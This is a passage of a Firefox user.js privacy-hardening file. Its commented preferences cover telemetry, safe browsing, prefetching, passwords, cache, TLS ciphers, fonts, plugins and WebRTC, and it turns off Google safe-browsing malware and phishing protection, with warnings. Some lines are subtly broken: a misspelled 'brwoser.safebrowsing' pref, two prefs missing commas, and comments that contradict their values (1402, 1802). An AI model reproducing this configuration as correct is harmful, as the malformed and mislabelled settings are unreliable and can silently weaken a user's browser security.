https://bugzilla.mozilla.org/show_bug.cgi?id=1195552 user_pref("datareporting.policy.dataSubmissionEnabled", false); // 0335: remove a telemetry clientID // if you haven´t got one, be proactive and set it now for future proofing user_pref("toolkit.telemetry.cachedClientID", ""); // 0336: disable "Heartbeat" (Mozilla user rating telemetry) // https://trac.torproject.org/projects/tor/ticket/18738 user_pref("browser.selfsupport.enabled", false); // (hidden pref) user_pref("browser.selfsupport.url", ""); // 0340: disable experiments // https://wiki.mozilla.org/Telemetry/Experiments user_pref("experiments.enabled", false); user_pref("experiments.manifest.uri", ""); user_pref("experiments.supported", false); user_pref("experiments.activeExperiment", false); // 0341: disable Mozilla permission to silently opt you into tests user_pref("network.allow-experiments", false); // 0350: disable crash reports user_pref("breakpad.reportURL", ""); // 0351: disable sending of crash reports (FF44+) user_pref("browser.tabs.crashReporting.sendReport", false); // 0360: disable new tab tile ads &preload &marketing junk user_pref("browser.newtab.preload", false); user_pref("browser.newtabpage.directory.ping", "data:text/plain,"); user_pref("browser.newtabpage.directory.source", "data:text/plain,"); user_pref("browser.newtabpage.enabled", false); user_pref("browser.newtabpage.enhanced", false); user_pref("browser.newtabpage.introShown", true); // 0370: disable "Snippets" (Mozilla content shown on about:home screen) // https://wiki.mozilla.org/Firefox/Projects/Firefox_Start/Snippet_Service // MUST use HTTPS - arbitrary content injected into this page via http opens up MiTM attacks user_pref("browser.aboutHomeSnippets.updateUrl", "https://127.0.0.1"); // 0373: disable "Pocket" (third party "save for later" service) &remove urls for good measure // NOTE: Important: Remove the pocket icon from your toolbar first // https://www.gnu.gl/blog/Posts/multiple-vulnerabilities-in-pocket/ user_pref("extensions.pocket.enabled", false); user_pref("extensions.pocket.api", ""); user_pref("extensions.pocket.site", ""); user_pref("extensions.pocket.oAuthConsumerKey", ""); // 0374: disable "social" integration // https://developer.mozilla.org/en-US/docs/Mozilla/Projects/Social_API user_pref("social.whitelist", ""); user_pref("social.toast-notifications.enabled", false); user_pref("social.shareDirectory", ""); user_pref("social.remote-install.enabled", false); user_pref("social.directories", ""); user_pref("social.share.activationPanelEnabled", false); user_pref("social.enabled", false); // (hidden pref) // 0375: disable "Reader View" user_pref("reader.parse-on-load.enabled", false); // 0376: disable FlyWeb, a set of APIs for advertising and discovering local-area web servers // https://wiki.mozilla.org/FlyWeb // http://www.ghacks.net/2016/07/26/firefox-flyweb/ user_pref("dom.flyweb.enabled", false); // 0380: disable sync user_pref("services.sync.enabled", false); // (hidden pref) /*** 0400: QUIET FOX [PART 2] This section has security &tracking protection implications vs privacy concerns. These settings are geared up to make FF "quiet" &private. I am NOT advocating no protection. If you turn these off, then by all means please use something superior, such as uBlock Origin. <font color=#ff3333>IMPORTANT: This entire section is rather contentious. Safebrowsing is designed to protect users from malicious sites. Tracking protection is designed to lessen the impact of third parties on websites to reduce tracking and to speed up your browsing experience. These are both very good features provided by Mozilla. They do rely on third parties: Google for safebrowsing and Disconnect for tracking protection (someone has to provide the information). Additionally, SSL Error Reporting helps makes the internet more secure for everyone. If you do not understand the ramifications of disabling all of these, then it is advised that you enable them by commenting out the preferences and saving the changes, and then in about:config find each entry and right-click and reset the preference´s value.</font> ***/ // 0401: DON´T disable extension blocklist, but sanitize blocklist url - SECURITY // It now includes updates for "revoked certificates" - security trumps privacy here // https://blog.mozilla.org/security/2015/03/03/revoking-intermediate-certificates-introducing-onecrl // https://trac.torproject.org/projects/tor/ticket/16931 user_pref("extensions.blocklist.enabled", true); user_pref("extensions.blocklist.url", "https://blocklist.addons.mozilla.org/blocklist/3/%APP_ID%/%APP_VERSION%/"); // 0402: disable/enable various Kinto blocklist updates (FF50+) // What is Kinto?: https://wiki.mozilla.org/Firefox/Kinto#Specifications // As FF transitions to Kinto, the blocklists have been broken down (more could be added). These contain // block entries for certs to be revoked, add-ons and plugins to be disabled, and gfx environments that // cause problems or crashes. Here you can remove the collection name to prevent each specific list updating user_pref("services.blocklist.update_enabled", true); user_pref("services.blocklist.signing.enforced", true); user_pref("services.blocklist.onecrl.collection", "certificates"); // Revoked certificates user_pref("services.blocklist.addons.collection", "addons"); user_pref("services.blocklist.plugins.collection", ""); // I have no plugins user_pref("services.blocklist.gfx.collection", ""); // I have gfx hw acceleration disabled // 0410: disable safe browsing // I have redesigned this sub-section to differentiate between "real-time"/"user initiated" // data being sent to Google from all other settings such as using local blocklists/whitelists // and updating those lists. There SHOULD be NO privacy issues here. Even *IF* an URL was sent // to Google, they swear it is anonymized and only used to flag malicious sites/activity. Firefox // also takes measures such as striping out identifying parameters and storing safe browsing // cookies in a separate jar. (#Turn on browser.safebrowsing.debug to monitor this activity) // To use safebrowsing but not "leak" binary download info to Google, only use 0410e and 0410f // #Required reading: https://feeding.cloud.geek.nz/posts/how-safe-browsing-works-in-firefox/ // https://wiki.mozilla.org/Security/Safe_Browsing // 0410a: disable "Block dangerous and deceptive content" This setting is under Options>Security // in FF47 and under this is was titled "Block reported web forgeries" // this covers deceptive sites such as phishing and social engineering user_pref("browser.safebrowsing.malware.enabled", false); user_pref("brwoser.safebrowsing.provider.mozilla.lists" ""); user_pref("browser.safebrowsing.phishing.enabled", false); // (FF50+) // 0410b: disable "Block dangerous downloads" This setting is under Options>Security // in FF47 and under this was titled "Block reported attack sites" // this covers malware and PUPs (potentially unwanted programs) user_pref("browser.safebrowsing.downloads.enabled", false); // disable "Warn me about unwanted and uncommon software" Also under Options>Security (FF48+) user_pref("browser.safebrowsing.downloads.remote.block_potentially_unwanted", false); user_pref("browser.safebrowsing.downloads.remote.block_uncommon", false); // yet more prefs added (FF49+) user_pref("browser.safebrowsing.downloads.remote.block_dangerous", false); user_pref("browser.safebrowsing.downloads.remote.block_dangerous_host", false); // 0410c: disable Google safebrowsing downloads, updates user_pref("browser.safebrowsing.provider.google.updateURL", ""); // update google lists user_pref("browser.safebrowsing.provider.google.gethashURL", ""); // list hash check user_pref("browser.safebrowsing.provider.google4.updateURL", ""); // (FF50+) user_pref("browser.safebrowsing.provider.google4.gethashURL", ""); // (FF50+) // 0410d: disable mozilla safebrowsing downloads, updates // NOTE: These two prefs are also used for Tracking Protection (see 0420) user_pref("browser.safebrowsing.provider.mozilla.gethashURL", ""); // resolves hash conflicts user_pref("browser.safebrowsing.provider.mozilla.updateURL", ""); // update FF lists // 0410e: disable binaries NOT in local lists being checked by Google (real-time checking) user_pref("browser.safebrowsing.downloads.remote.enabled", false); user_pref("browser.safebrowsing.downloads.remote.url", ""); // 0410f: disable reporting URLs user_pref("browser.safebrowsing.provider.google.reportURL", ""); user_pref("browser.safebrowsing.reportMalwareMistakeURL", ""); user_pref("browser.safebrowsing.reportPhishMistakeURL", ""); user_pref("browser.safebrowsing.reportPhishURL", ""); user_pref("browser.safebrowsing.provider.google4.reportURL", ""); // (FF50+) // 0410g: show=true or hide=false the ´ignore this warning´ on Safe Browsing warnings which // when clicked bypasses the block for that session. This is a means for admins to enforce SB // https://bugzilla.mozilla.org/show_bug.cgi?id=1226490 // tests: see APPENDIX A: TEST SITES - Section 06 // user_pref("browser.safebrowsing.allowOverride", true); // 0420: disable tracking protection // There SHOULD be NO privacy concerns here, but you are better off using an extension such as // uBlock Origin which is not decided by a third party (disconnect) and is far more effective // (when used correctly). NOTE: There are two prefs (see 0410d) shared with Safe Browsing // https://wiki.mozilla.org/Security/Tracking_protection // https://support.mozilla.org/en-US/kb/tracking-protection-firefox user_pref("privacy.trackingprotection.enabled", false); // all windows pref (not just private) user_pref("privacy.trackingprotection.pbmode.enabled", false); // private browsing pref // 0421: enable more Tracking Protection choices under Options>Privacy>Use Tracking Protection user_pref("privacy.trackingprotection.ui.enabled", true); // 0430: disable SSL Error Reporting - PRIVACY // https://gecko.readthedocs.org/en/latest/browser/base/sslerrorreport/preferences.html user_pref("security.ssl.errorReporting.automatic", false); user_pref("security.ssl.errorReporting.enabled", false); user_pref("security.ssl.errorReporting.url", ""); // 0440: disable Mozilla´s blocklist for known Flash tracking/fingerprinting (48+) // If you don´t have Flash, then you don´t need this enabled // NOTE: if enabled, you will need to check what prefs (safebrowsing URLs etc) this uses to update // http://www.ghacks.net/2016/07/18/firefox-48-blocklist-against-plugin-fingerprinting/ // https://bugzilla.mozilla.org/show_bug.cgi?id=1237198 user_pref("browser.safebrowsing.blockedURIs.enabled", false); /*** 0600: BLOCK IMPLICIT OUTBOUND [not explicitly asked for - eg clicked on] ***/ // 0601: disable link prefetching // https://developer.mozilla.org/en-US/docs/Web/HTTP/Link_prefetching_FAQ user_pref("network.prefetch-next", false); // 0602: disable dns prefetching // http://www.ghacks.net/2013/04/27/firefox-prefetching-what-you-need-to-know/ // https://developer.mozilla.org/en-US/docs/Web/HTTP/Controlling_DNS_prefetching user_pref("network.dns.disablePrefetch", true); user_pref("network.dns.disablePrefetchFromHTTPS", true); // (hidden pref) // 0603: disable Seer/Necko // https://developer.mozilla.org/en-US/docs/Mozilla/Projects/Necko user_pref("network.predictor.enabled", false); // 0603a: disable more Necko/Captive Portal // https://en.wikipedia.org/wiki/Captive_portal // https://wiki.mozilla.org/Necko/CaptivePortal user_pref("captivedetect.canonicalURL", ""); user_pref("network.captive-portal-service.enabled", false); // (FF52+?) // 0604: disable search suggestions user_pref("browser.search.suggest.enabled", false); // 0605: disable link-mouseover opening connection to linked server // http://news.slashdot.org/story/15/08/14/2321202/how-to-quash-firefoxs-silent-requests // http://www.ghacks.net/2015/08/16/block-firefox-from-connecting-to-sites-when-you-hover-over-links user_pref("network.http.speculative-parallel-limit", 0); // 0606: disable pings (but enforce same host in case) // http://kb.mozillazine.org/Browser.send_pings // http://kb.mozillazine.org/Browser.send_pings.require_same_host user_pref("browser.send_pings", false); user_pref("browser.send_pings.require_same_host", true); // 0607: stop links launching Windows Store on Windows 8/8.1/10 // http://www.ghacks.net/2016/03/25/block-firefox-chrome-windows-store/ user_pref("network.protocol-handler.external.ms-windows-store", false); // 0608: disable predictor / prefetching (FF48+) user_pref("network.predictor.enable-prefetch", false); /*** 0800: LOCATION BAR / SEARCH / AUTO SUGGESTIONS / HISTORY / FORMS etc Not ALL of these are strictly needed, some are for the truly paranoid, but included for a more comprehensive list (see comments on each one) ***/ // 0801: disable location bar using search - PRIVACY // don´t leak typos to a search engine, give an error message instead user_pref("keyword.enabled", false); // 0802: disable location bar domain guessing - PRIVACY/SECURITY // domain guessing intercepts DNS "hostname not found errors" and resends a // request (eg by adding www or .com). This is inconsistent use (eg FQDNs), does not work // via Proxy Servers (different error), is a flawed use of DNS (TLDs: why treat .com // as the 411 for DNS errors?), privacy issues (why connect to sites you didn´t // intend to), can leak sensitive data (eg query strings: eg Princeton attack), // and is a security risk (eg common typos &malicious sites set up to exploit this) user_pref("browser.fixup.alternate.enabled", false); // 0803: disable locationbar dropdown - PRIVACY (shoulder surfers,forensics/unattended browser) user_pref("browser.urlbar.maxRichResults", 0); // 0804: display all parts of the url // why rely on just a visual clue - helps SECURITY user_pref("browser.urlbar.trimURLs", false); // 0805: disable URLbar autofill - PRIVACY (shoulder surfers, forensics/unattended browser) // http://kb.mozillazine.org/Inline_autocomplete user_pref("browser.urlbar.autoFill", false); user_pref("browser.urlbar.autoFill.typed", false); // 0806: disable autocomplete - PRIVACY (shoulder surfers, forensics/unattended browser) user_pref("browser.urlbar.autocomplete.enabled", false); // 0808: disable history suggestions - PRIVACY (shoulder surfers, forensics/unattended browser) user_pref("browser.urlbar.suggest.history", false); // 0809: limit history leaks via enumeration (PER TAB: back/forward) - PRIVACY // This is a PER TAB session history. You still have a full history stored under all history // default=50, minimum=1=currentpage, 2 is the recommended minimum as some pages // use it as a means of referral (eg hotlinking), 4 or 6 may be more practical user_pref("browser.sessionhistory.max_entries", 4); // 0810: disable css querying page history - css history leak - PRIVACY // NOTE: this has NEVER been fully "resolved": in Mozilla/docs it is stated it´s only in // ´certain circumstances´, also see latest comments in the bug link // https://dbaron.org/mozilla/visited-privacy // https://bugzilla.mozilla.org/show_bug.cgi?id=147777 // https://developer.mozilla.org/en-US/docs/Web/CSS/Privacy_and_the_:visited_selector user_pref("layout.css.visited_links_enabled", false); // 0811: disable displaying javascript in history URLs - SECURITY user_pref("browser.urlbar.filter.javascript", true); // 0812: disable search and form history // Under Options>Privacy> if you set Firefox to "use custom settings" there will be a // setting called "remember search and form history". // You can clear formdata on exiting Firefox (see 2803) // user_pref("browser.formfill.enable", false); // 0813: disable saving form data on secure websites - PRIVACY (shoulder surfers etc) // For convenience &functionality, this is best left at default true. // You can clear formdata on exiting Firefox (see 2803) // user_pref("browser.formfill.saveHttpsForms", false); // 0815: disable live search suggestions in the urlbar and toggle off the Opt-In prompt (FF41+) // Setting: Options>Privacy>Location Bar>Related searches from the default search engine user_pref("browser.urlbar.suggest.searches", false); user_pref("browser.urlbar.userMadeSearchSuggestionsChoice", true); // 0816: disable browsing and download history // Under Options>Privacy> if you set Firefox to "use custom settings" there will be a // setting called "remember my browsing and download history" // You can clear history and downloads on exiting Firefox (see 2803) // user_pref("places.history.enabled", false); // 0817: disable Jumplist (Windows7+) user_pref("browser.taskbar.lists.enabled", false); user_pref("browser.taskbar.lists.frequent.enabled", false); user_pref("browser.taskbar.lists.recent.enabled", false); user_pref("browser.taskbar.lists.tasks.enabled", false); // 0818: disable taskbar preview user_pref("browser.taskbar.previews.enable", false); // 0819: disable one-off searches from the addressbar (FF51+) // http://www.ghacks.net/2016/08/09/firefox-one-off-searches-address-bar/ user_pref("browser.urlbar.oneOffSearches", false); // 0820: disable search reset (about:searchreset) (FF51+) // http://www.ghacks.net/2016/08/19/firefox-51-search-restore-feature/ user_pref("browser.search.reset.enabled", false); user_pref("browser.search.reset.whitelist", ""); /*** 0900: PASSWORDS ***/ // 0901: disable saving passwords // Options>Security>Logins>Remember logins for sites // NOTE: this does not clear any passwords already saved // user_pref("signon.rememberSignons", false); // 0902: use a master password (recommended if you save passwords) // There are no preferences for this. It is all handled internally. // https://support.mozilla.org/en-US/kb/use-master-password-protect-stored-logins // 0903: set how often Mozilla should ask for the master password // 0=the first time, 1=every time it´s needed, 2=every n minutes (as per the next pref) // WARNING: the default is 0, author changed his settings user_pref("security.ask_for_password", 0); // 0904: how often in minutes Mozilla should ask for the master password (see pref above) // in minutes, default is 30 user_pref("security.password_lifetime", 30); // 0905: disable auto-filling username &password form fields - SECURITY // can leak in cross-site forms AND be spoofed // http://kb.mozillazine.org/Signon.autofillForms // password will still be auto-filled after a user name is manually entered user_pref("signon.autofillForms", false); // 0906: ignore websites´ autocomplete="off" (FF30+) user_pref("signon.storeWhenAutocompleteOff", true); // 0907: force warnings for logins on non-secure (non HTTPS) pages // https://bugzilla.mozilla.org/show_bug.cgi?id=1217156 user_pref("security.insecure_password.ui.enabled", true); // 0908: When attempting to fix an entered URL, do not fix an entered password along with it // i.e do not turn ~http://user:password@foo into ~http://user:password@(prefix)foo(suffix) // but instead ~http://user@(prefix)foo(suffix)) user_pref("browser.fixup.hide_user_pass", true); // 0909: disabling for now (FF51+) user_pref("signon.formlessCapture.enabled", false); /*** 1000: CACHE ***/ // 1001: disable disk cache user_pref("browser.cache.disk.enable", false); user_pref("browser.cache.disk.capacity", 0); user_pref("browser.cache.disk.smart_size.enabled", false); user_pref("browser.cache.disk.smart_size.first_run", false); // 1002: disable disk caching of SSL pages // http://kb.mozillazine.org/Browser.cache.disk_cache_ssl user_pref("browser.cache.disk_cache_ssl", false); // 1003: disable memory cache as well IF you´re REALLY paranoid // I haven´t tried it, but I´m sure you´ll take a performance/traffic hit // user_pref("browser.cache.memory.enable", false); // 1004: disable offline cache user_pref("browser.cache.offline.enable", false); // 1005: disable storing extra session data 0=all 1=http-only 2=none // extra session data contains contents of forms, scrollbar positions, cookies and POST data user_pref("browser.sessionstore.privacy_level", 2); // 1006: disable pages being stored in memory. This is not the same as memory cache. // Visited pages are stored in memory in such a way that they don´t have to be // re-parsed. This improves performance when pressing back/forward. // For the sake of completeness, this option is listed for the truly paranoid. // 0=none, -1=auto (that´s minus 1), or any other positive integer // http://kb.mozillazine.org/Browser.sessionhistory.max_total_viewers // user_pref("browser.sessionhistory.max_total_viewers", 0); // 1007: disable the Session Restore service completely // WARNING: This also disables the "Recently Closed Tabs" feature // It does not affect "Recently Closed Windows" or any history. user_pref("browser.sessionstore.max_tabs_undo", 0); user_pref("browser.sessionstore.max_windows_undo", 0); // 1008: IF you use session restore (see 1007 above), increasing the minimal interval between // two session save operations can help on older machines and some websites. // Default is 15000 (15 secs). Try 30000 (30sec), 60000 (1min) etc - your choice. // WARNING: This can also affect entries in the "Recently Closed Tabs" feature: // i.e the longer the interval the more chance a quick tab open/close won´t be captured // this longer interval *MAY* affect history but I cannot replicate any history not recorded // user_pref("browser.sessionstore.interval", 30000); // 1009: DNS cache and expiration time (default 400 and 60 - same as TBB) // user_pref("network.dnsCacheEntries", 400); // user_pref("network.dnsCacheExpiration", 60); // 1010: disable randomized FF HTTP cache decay experiments // https://trac.torproject.org/projects/tor/ticket/13575 user_pref("browser.cache.frecency_experiment", -1); // 1011: disable permissions manager from writing to disk (requires restart) // https://bugzilla.mozilla.org/show_bug.cgi?id=967812 // user_pref("permissions.memory_only", true); // (hidden pref) // 1012: disable resuming session from crash user_pref("browser.sessionstore.resume_from_crash", false); /*** 1200: SSL / OCSP / CERTS / ENCRYPTION / HSTS/HPKP/HTTPS Note that your cipher and other settings can be used server side as a fingerprint attack vector: see https://www.securityartwork.es/2017/02/02/tls-client-fingerprinting-with-bro/ . You can either strengthen your encryption/cipher suite and protocols (security) or keep them at default and let Mozilla handle them (dragging their feet for fear of breaking legacy sites) ***/ // 1201: block rc4 fallback (default is now false as of at least FF45) user_pref("security.tls.unrestricted_rc4_fallback", false); // 1203: enable OCSP stapling // https://blog.mozilla.org/security/2013/07/29/ocsp-stapling-in-firefox/ user_pref("security.ssl.enable_ocsp_stapling", true); // 1204: reject communication with servers using old SSL/TLS - vulnerable to a MiTM attack // https://wiki.mozilla.org/Security:Renegotiation // WARNING: tested Jan 2017 - still breaks too many sites // user_pref("security.ssl.require_safe_negotiation", true); // 1205: display warning (red padlock) for "broken security" // https://wiki.mozilla.org/Security:Renegotiation user_pref("security.ssl.treat_unsafe_negotiation_as_broken", true); // 1206: require certificate revocation check through OCSP protocol // This leaks information about the sites you visit to the CA (cert authority) // It´s a trade-off between security (checking) and privacy (leaking info to the CA) // WARNING: Since FF44 the default is false. If set to true, this may/will cause some // site breakage. Some users have previously mentioned issues with youtube, microsoft etc // user_pref("security.OCSP.require", true); // 1207: query OCSP responder servers to confirm current validity of certificates (default=1) // 0=disable, 1=validate only certificates that specify an OCSP service URL // 2=enable and use values in security.OCSP.URL and security.OCSP.signing user_pref("security.OCSP.enabled", 1); // 1208: enforce strict pinning // https://trac.torproject.org/projects/tor/ticket/16206 // PKP (public key pinning) 0-disabled 1=allow user MiTM (such as your antivirus), 2=strict // WARNING: If you rely on an AV (antivirus) to protect your web browsing // by inspecting ALL your web traffic, then leave at current default =1 user_pref("security.cert_pinning.enforcement_level", 2); // 1209: control TLS versions with min and max // 1=min version of TLS 1.0, 2-min version of TLS 1.1, 3=min version of TLS 1.2 etc // WARNING: FF/chrome currently allow TLS 1.0 by default, so this is your call. // http://kb.mozillazine.org/Security.tls.version.* // https://www.ssl.com/how-to/turn-off-ssl-3-0-and-tls-1-0-in-your-browser/ // user_pref("security.tls.version.min", 2); // user_pref("security.tls.version.fallback-limit", 3); // user_pref("security.tls.version.max", 4); // allow up to and including TLS 1.3 // 1210: disable 1024-DH Encryption // https://www.eff.org/deeplinks/2015/10/how-to-protect-yourself-from-nsa-attacks-1024-bit-DH // WARNING: may break obscure sites, but not major sites, which should support ECDH over DHE user_pref("security.ssl3.dhe_rsa_aes_128_sha", false); user_pref("security.ssl3.dhe_rsa_aes_256_sha", false); // 1211: disable or limit SHA-1 // 0 = all SHA1 certs are allowed // 1 = all SHA1 certs are blocked (including perfectly valid ones from 2015 and earlier) // 2 = deprecated option that now maps to 1 // 3 = only allowed for locally-added roots (e.g. anti-virus) // 4 = only allowed for locally-added roots or for certs in 2015 and earlier // WARNING: when disabled, some man-in-the-middle devices (eg security scanners and antivirus // products, are failing to connect to HTTPS sites. SHA-1 will eventually become obsolete. // https://blog.mozilla.org/security/2016/10/18/phasing-out-sha-1-on-the-public-web/ // https://github.com/pyllyukko/user.js/issues/194#issuecomment-256509998 user_pref("security.pki.sha1_enforcement_level", 1); // 1212: disable SSL session tracking (36+) // SSL session IDs speed up HTTPS connections (no need to renegotiate) and last for 48hrs. // Since the ID is unique, web servers can (and do) use it for tracking. If set to true, // this disables sending SSL3 Session IDs and TLS Session Tickets to prevent session tracking // WARNING: This will slow down TLS connections (personally I don´t notice it at all) // https://tools.ietf.org/html/rfc5077 // https://bugzilla.mozilla.org/show_bug.cgi?id=967977 user_pref("security.ssl.disable_session_identifiers", true); // (hidden pref) // 1213: disable 3DES (effective key size < 128) // https://en.wikipedia.org/wiki/3des#Security // http://en.citizendium.org/wiki/Meet-in-the-middle_attack // http://www-archive.mozilla.org/projects/security/pki/nss/ssl/fips-ssl-ciphersuites.html user_pref("security.ssl3.rsa_des_ede3_sha", false); // 1214: disable 128 bits user_pref("security.ssl3.ecdhe_ecdsa_aes_128_sha", false); user_pref("security.ssl3.ecdhe_rsa_aes_128_sha", false); // 1215: disable Microsoft Family Safety cert (Windows 8.1) // 0: disable detecting Family Safety mode and importing the root // 1: only attempt to detect Family Safety mode (don´t import the root) // 2: detect Family Safety mode and import the root user_pref("security.family_safety.mode", 0); // 1216: disable insecure active content on https pages - mixed content user_pref("security.mixed_content.block_active_content", true); // 1217: disable insecure passive content (such as images) on https pages - mixed context // current default=false, leave it this way as too many sites break visually // user_pref("security.mixed_content.block_display_content", true); // 1218: disable HSTS Priming (FF51+) // RISKS: formerly blocked mixed-content may load, may cause noticeable delays eg requests // time out, requests may not be handled well by servers, possible fingerprinting // https://bugzilla.mozilla.org/show_bug.cgi?id=1246540#c145 user_pref("security.mixed_content.send_hsts_priming", false); user_pref("security.mixed_content.use_hsts", false); // 1219: disable HSTS preload list // recommended enabled, unless you fully understand the risks and trade-offs // user_pref("network.stricttransportsecurity.preloadlist", false); // 1220: disable intermediate certificate caching (fingerprinting attack vector) // NOTE: This affects login/cert/key dbs. AFAIK the only effect is all active logins start anew // per session. This may be better handled under FPI (ticket 1323644, part of Tor Uplift) // https://bugzilla.mozilla.org/show_bug.cgi?id=1334485 // related bug // https://bugzilla.mozilla.org/show_bug.cgi?id=1216882 // related bug (see comment 9) // user_pref("security.nocertdb", true); // (hidden pref) /*** 1400: FONTS ***/ // 1401: disable websites downloading their own fonts (0=block, 1=allow) // This setting is under Options>Content>Font &Colors>Advanced>Allow pages to choose... // If you disallow fonts, this drastically limits/reduces font enumeration (by JS) which // is a high entropy fingerprinting vector. // WARNING: Disabling fonts can uglify the web a fair bit. user_pref("browser.display.use_document_fonts", 0); // 1402: allow icon fonts (glyphs) (FF41+) user_pref("gfx.downloadable_fonts.enabled", false); // 1403: disable rendering of SVG OpenType fonts // https://wiki.mozilla.org/SVGOpenTypeFonts - iSECPartnersReport recommends to disable this user_pref("gfx.font_rendering.opentype_svg.enabled", false); // 1404: use more legible default fonts // WARNING: These are the author´s settings, comment out if you do not require them // Been using this for over a year, it really grows on you user_pref("font.default.x-western" "sans-serif"); user_pref("font.language.group", "x-western"); user_pref("font.name.serif.x-western", "sans"); // user_pref("font.name.sans-serif.x-unicode", "Arial"); // user_pref("font.name.sans-serif.x-western", "Arial"); // default Arial // user_pref("font.name.monospace.x-unicode", "Lucida Console"); // user_pref("font.name.monospace.x-western", "Lucida Console"); // default Courier New // 1405: disable woff2 user_pref("gfx.downloadable_fonts.woff2.enabled", false); // 1406: disable CSS Font Loading API // WARNING: Disabling fonts can uglify the web a fair bit. user_pref("layout.css.font-loading-api.enabled", false); // 1407: remove special underline handling for a few fonts which you will probably never use. // Any of these fonts on your system can be enumerated for fingerprinting. Requires restart. // http://kb.mozillazine.org/Font.blacklist.underline_offset user_pref("font.blacklist.underline_offset", ""); // 1408: disable graphite which FF49 turned back on by default // In the past it had security issues - need citation user_pref("gfx.font_rendering.graphite.enabled", false); /*** 1600: HEADERS / REFERERS Except for 1601 and 1602, these can all be best handled by an extension to block/spoof all and then whitelist if needed, otherwise too much of the internet breaks. http://www.ghacks.net/2015/01/22/improve-online-privacy-by-controlling-referrer-information/ #Required reading: https://feeding.cloud.geek.nz/posts/tweaking-referrer-for-privacy-in-firefox/ ***/ // 1601: disable referer from an SSL Website // to be deprecated in FF52+? - https://bugzilla.mozilla.org/show_bug.cgi?id=1308725 user_pref("network.http.sendSecureXSiteReferrer", false); // 1602: DNT HTTP header - essentially USELESS - default is off. I recommend off. // NOTE: "Options>Privacy>Tracking>Request that sites not track you" // if you use NoScript MAKE SURE to set your noscript.doNotTrack.enabled to match // http://kb.mozillazine.org/Privacy.donottrackheader.value (pref required since FF21+) // user_pref("privacy.donottrackheader.enabled", true); // user_pref("privacy.donottrackheader.value", 1); // (hidden pref) // 1603: referer, WHEN to send // 0=never, 1=send only when links are clicked, 2=for links and images (default) // user_pref("network.http.sendRefererHeader", 2); // 1604: referer, SPOOF or NOT (default=false) // user_pref("network.http.referer.spoofSource", false); // 1605: referer, HOW to handle cross origins // 0=always (default), 1=only if base domains match, 2=only if hosts match // user_pref("network.http.referer.XOriginPolicy", 0); // 1606: referer, WHAT to send (limit the information) // 0=send full URI (default), 1=scheme+host+port+path, 2=scheme+host+port // user_pref("network.http.referer.trimmingPolicy", 0); /*** 1800: PLUGINS ***/ // 1801: set default plugin state (i.e new plugins on discovery) to never activate // 0=disabled, 1=ask to activate, 2=active - you can override individual plugins user_pref("plugin.default.state", 0); user_pref("plugin.defaultXpi.state", 0); // 1802: enable click to play and set to 0 minutes user_pref("plugins.click_to_play", false); user_pref("plugin.sessionPermissionNow.intervalInMinutes", 0); // 1802a: make sure a plugin is in a certain state: 0=deactivated 1=ask 2=enabled (Flash example) // you can set all these plugin.state´s via Add-ons>Plugins or search for plugin.state in about:config // NOTE: you can still over-ride individual sites eg youtube via site permissions // http://www.ghacks.net/2013/07/09/how-to-make-sure-that-a-firefox-plugin-never-activates-again/ user_pref("plugin.state.flash", 0); // 1804: disable plugins using external/untrusted scripts with XPCOM or XPConnect user_pref("security.xpconnect.plugin.unrestricted", false); // 1805: disable scanning for plugins // http://kb.mozillazine.org/Plugin_scanning // plid.all = whether to scan the directories specified in the Windows registry for PLIDs // includes: RealPlayer, Next-Generation Java Plug-In, Adobe Flash, Antivirus etc // WARNING: The author turned off plugins, try it one day. You are not missing much. // user_pref("plugin.scan.plid.all", false); // 1806: Acrobat, Quicktime, WMP are handled separately from 1805 above. // The string refers to min version number allowed // user_pref("plugin.scan.Acrobat", "99999"); // user_pref("plugin.scan.Quicktime", "99999"); // user_pref("plugin.scan.WindowsMediaPlayer", "99999"); // 1807: disable auto-play of HTML5 media // WARNING: This may break youtube video playback (and probably other sites). If you block // autoplay but occasionally would like a toggle button, try the following add-on // https://addons.mozilla.org/en-US/firefox/addon/autoplay-toggle user_pref("media.autoplay.enabled", false); // 1808: disable audio auto-play in non-active tabs (FF51+) // http://www.ghacks.net/2016/11/14/firefox-51-blocks-automatic-audio-playback-in-non-active-tabs/ user_pref("media.block-autoplay-until-in-foreground", true); // 1820: disable all GMP (Gecko Media Plugins) // https://wiki.mozilla.org/GeckoMediaPlugins user_pref("media.gmp-provider.enabled", false); user_pref("media.gmp.trial-create.enabled", false); // 1825: disable widevine CDM user_pref("media.gmp-widevinecdm.visible", false); user_pref("media.gmp-widevinecdm.enabled", false); user_pref("media.gmp-widevinecdm.autoupdate", false); // 1830: disable all DRM content (EME: Encryption Media Extension) user_pref("media.eme.enabled", false); // Options>Content>Play DRM Content user_pref("browser.eme.ui.enabled", false); // hides "Play DRM Content" checkbox, restart required user_pref("media.eme.apiVisible", false); // block websites detecting DRM is disabled // 1840: disable the OpenH264 Video Codec by Cisco to "Never Activate" // This is the bundled codec used for video chat in WebRTC // Disable pings to the external update/download server user_pref("media.gmp-gmpopenh264.enabled", false); // (hidden pref) user_pref("media.gmp-gmpopenh264.autoupdate", false); user_pref("media.gmp-manager.url", "data:text/plain,"); // 1850: disable the Adobe EME "Primetime CDM" (Content Decryption Module) // https://trac.torproject.org/projects/tor/ticket/16285 user_pref("media.gmp-eme-adobe.enabled", false); user_pref("media.gmp-eme-adobe.visible", false); user_pref("media.gmp-eme-adobe.autoupdate", false); /*** 2000: MEDIA / CAMERA / MIKE ***/ // 2001: disable WebRTC // https://www.privacytools.io/#webrtc user_pref("media.peerconnection.enabled", false); user_pref("media.peerconnection.use_document_iceservers", false); user_pref("media.peerconnection.video.enabled", false); user_pref("media.peerconnection.identity.enabled", false); user_pref("media.peerconnection.identity.timeout", 1); user_pref("media.peerconnection.turn.disable", true); // disable video capability for WebRTC user_pref("media.navigator.video.enabled", false); // 2001a: pref which improves the WebRTC IP Leak issue, as opposed to completely // disabling WebRTC. You still need to enable WebRTC for this to be applicable (FF42+) // https://wiki.mozilla.org/Media/WebRTC/Privacy user_pref("media.peerconnection.ice.default_address_only", true); // (FF41-FF50) user_pref("media.peerconnection.ice.no_host", true); // (FF51+) // 2010: disable WebGL, force bare minimum feature set if used &disable WebGL extensions // http://www.contextis.com/resources/blog/webgl-new-dimension-browser-exploitation/ // https://security.stackexchange.com/questions/13799/is-webgl-a-security-concern user_pref("webgl.disabled", true); user_pref("pdfjs.enableWebGL", false); user_pref("webgl.min_capability_mode", true); user_pref("webgl.disable-extensions", true); user_pref("webgl.disable-fail-if-major-performance-caveat", true); // 2011: don´t make WebGL debug info available to websites // https://bugzilla.mozilla.org/show_bug.cgi?id=1171228 // 